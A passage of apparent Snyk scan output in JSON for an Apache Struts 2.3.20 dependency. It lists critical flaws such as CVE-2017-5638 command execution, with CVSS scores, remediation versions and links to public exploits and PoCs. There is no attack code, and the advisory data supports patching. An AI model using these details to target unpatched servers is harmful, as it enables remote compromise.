"functionId": { + "filePath": "org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java", + "className": "JakartaMultiPartRequest", + "functionName": "buildErrorMessage" + } + }, + { + "version": [ + "[2.5.0, 2.5.10.1)" + ], + "functionId": { + "filePath": "org/apache/struts2/interceptor/FileUploadInterceptor.java", + "className": "FileUploadInterceptor", + "functionName": "intercept" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638", + "title": "CVE Details" + }, + { + "url": "https://exploit-db.com/exploits/41614", + "title": "Exploit DB" + }, + { + "url": "https://www.exploit-db.com/exploits/41570/", + "title": "Exploit DB" + }, + { + "url": "https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/rapid7/metasploit-framework/issues/8064", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/rapid7/metasploit-framework/pull/8072", + "title": "GitHub PR" + }, + { + "url": "https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc", + "title": "PoC" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-045", + "title": "Struts Wiki" + }, + { + "url": "http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html", + "title": "Talos Intelligence Blog" + }, + { + "url": "https://www.exploit-db.com/exploits/41570", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-5638.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:47:26.418639Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:06:03.020507Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:26.418639Z" + } + ], + "description": "## Overview\r\n[`org.apache.struts:struts2-core`](https://cwiki.apache.org/confluence/display/WW/Home) is an elegant, extensible framework for building enterprise-ready Java web applications.\r\n\r\nAffected versions of the package are vulnerable to Arbitrary Command Execution while uploading files with the Jakarta Multipart parser. This particular vulnerability can be exploited by an attacker by sending a crafted request to upload a file to the vulnerable server that uses a Jakarta-based plugin to process the upload request.\r\n\r\nThe attacker can then send malicious code in the `Content-Type`, `Content-Disposition` or `Content-Length` HTTP headers, which will then be executed by the vulnerable server. [A proof of concept](https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc) that demonstrates the attack scenario is publicly available and the vulnerability is being [actively exploited in the wild](https://www.theregister.co.uk/2017/03/09/apache_under_attack_patch_for_zero_day_available/).\r\n\r\nAlthough maintainers of the open source project immediately patched the vulnerability, Struts servers that have yet to install the update remain under attack by hackers who exploit it to inject commands of their choice.\r\n\r\nThis attack can be achieved without authentication. 
To make matters worse, web applications don't necessarily need to successfully upload a malicious file to exploit this vulnerability, as just the presence of the vulnerable Struts library within an application is enough to exploit the vulnerability.\r\n\r\n## Remediation\r\nUpgrade `org.apache.struts:struts2-core` to version 2.3.32, 2.5.10.1 or higher.\n\n## References\n- [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638)\n- [https://exploit-db.com/exploits/41614](https://exploit-db.com/exploits/41614)\n- [https://www.exploit-db.com/exploits/41570/](https://www.exploit-db.com/exploits/41570/)\n- [https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7](https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7)\n- [https://github.com/rapid7/metasploit-framework/issues/8064](https://github.com/rapid7/metasploit-framework/issues/8064)\n- [https://github.com/rapid7/metasploit-framework/pull/8072](https://github.com/rapid7/metasploit-framework/pull/8072)\n- [https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc](https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc)\n- [https://cwiki.apache.org/confluence/display/WW/S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045)\n- [http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html](http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html)\n", + "epssDetails": { + "percentile": "0.99996", + "probability": "0.97546", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-5638" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-j77q-2qqg-6989" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-03-19T10:28:21.873000Z", + "functions_new": [ + { + "version": [ + 
"[2.3.5, 2.3.32)" + ], + "functionId": { + "className": "org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest", + "functionName": "buildErrorMessage" + } + }, + { + "version": [ + "[2.5.0, 2.5.10.1)" + ], + "functionId": { + "className": "org.apache.struts2.interceptor.FileUploadInterceptor", + "functionName": "intercept" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-03-05T22:00:00Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-03-21T15:30:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.313495Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.32" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30770", + "title": "Command Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.20.2)", + "[2.3.24, 2.3.24.2)", + "[2.3.28, 2.3.28.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.20.2", + "2.3.24.2", + "2.3.28.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": 
"https://exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081", + "title": "NVD" + }, + { + "url": "https://www.exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:02.554699Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Command Injection. 
When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n", + "epssDetails": { + "percentile": "0.99987", + "probability": "0.97524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3081" + ], + "CWE": [ + "CWE-77" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.315000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-04-22T04:32:51Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-04-22T04:32:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:20.892839Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": 
"SNYK-JAVA-ORGAPACHESTRUTS-30771", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.20.2)", + "[2.3.24,2.3.24.2)", + "[2.3.28,2.3.28.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.20.2", + "2.3.24.2", + "2.3.28.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/6bd694b7980494c12d49ca1bf39f12aec3e03e2f", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3082", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:47.685356Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.390655Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.685356Z" + } + ], + "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22) is a free open-source solution for creating Java web applications.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. 
It allows remote attackers to execute arbitrary code via the stylesheet location parameter.\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3082)", + "epssDetails": { + "percentile": "0.99401", + "probability": "0.95903", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3082" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.327000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-04-22T02:36:52.273000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-04-22T02:36:52.273000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:47.685356Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30772", + "title": "Arbitrary Command Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.20.2)", + "[2.3.24,2.3.24.3)", + "[2.3.28,2.3.28.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.20.2", + "2.3.24.3", + "2.3.28.1" + ], + "patches": [], + "insights": { + 
"triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://exploit-db.com/exploits/39919", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/6bd694b7980494c12d49ca1bf39f12aec3e03e2f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/98d2692e434fe7f4d445ade24fe2c9860de1c13f", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3087", + "title": "NVD" + }, + { + "url": "https://www.exploit-db.com/exploits/39919", + "title": "Exploit DB" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:49.896841Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.893991Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:49.896841Z" + } + ], + "description": "## Overview\r\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\r\nApache Struts 2.3.20.x before 2.3.20.3, 2.3.24.x before 2.3.24.3, and 2.3.28.x before 2.3.28.1, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via vectors related to an ! 
(exclamation mark) operator to the REST Plugin.\r\n\r\n## References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3087)", + "epssDetails": { + "percentile": "0.97435", + "probability": "0.46493", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3087" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.339000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-02T00:40:36Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-02T00:40:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:12.756827Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30773", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.3.28)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.28" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": 
"https://github.com/apache/struts/commit/5421930b49822606792f36653b17d3d95ef106f9", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/72471d7075681bea52046645ad7aa34e9c53751e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/a89bbe22cd2461748d595a89a254de888a415e6c", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:54.345030Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:27.272926Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:54.345030Z" + } + ], + "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\nCross-site Scripting (XSS) vulnerability in the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a url-encoded parameter.\n\n## Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. 
The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n### Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. 
When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n### Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n### How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. 
\r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003)", + "epssDetails": { + "percentile": "0.88699", + "probability": "0.01905", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4003" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.353000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-03-16T06:52:13.014000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-03-16T06:52:13.014000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:54.345030Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30774", + "title": "Cross-site Request Forgery (CSRF)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + 
"credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.29)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-038.html", + "title": "Apache Struts Security Bulletin" + }, + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4430", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:55.023333Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:09.208211Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:55.023333Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Cross-site Request Forgery (CSRF). 
It mishandles token validation, which allows remote attackers to conduct CSRF attacks via unspecified vectors.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-038.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4430)\n", + "epssDetails": { + "percentile": "0.75315", + "probability": "0.00450", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4430" + ], + "CWE": [ + "CWE-352" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.364000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-20T07:00:37Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-20T07:00:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:55.023333Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30775", + "title": "Access Restriction Bypass", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.29)" + ] + }, + "exploit": "Not 
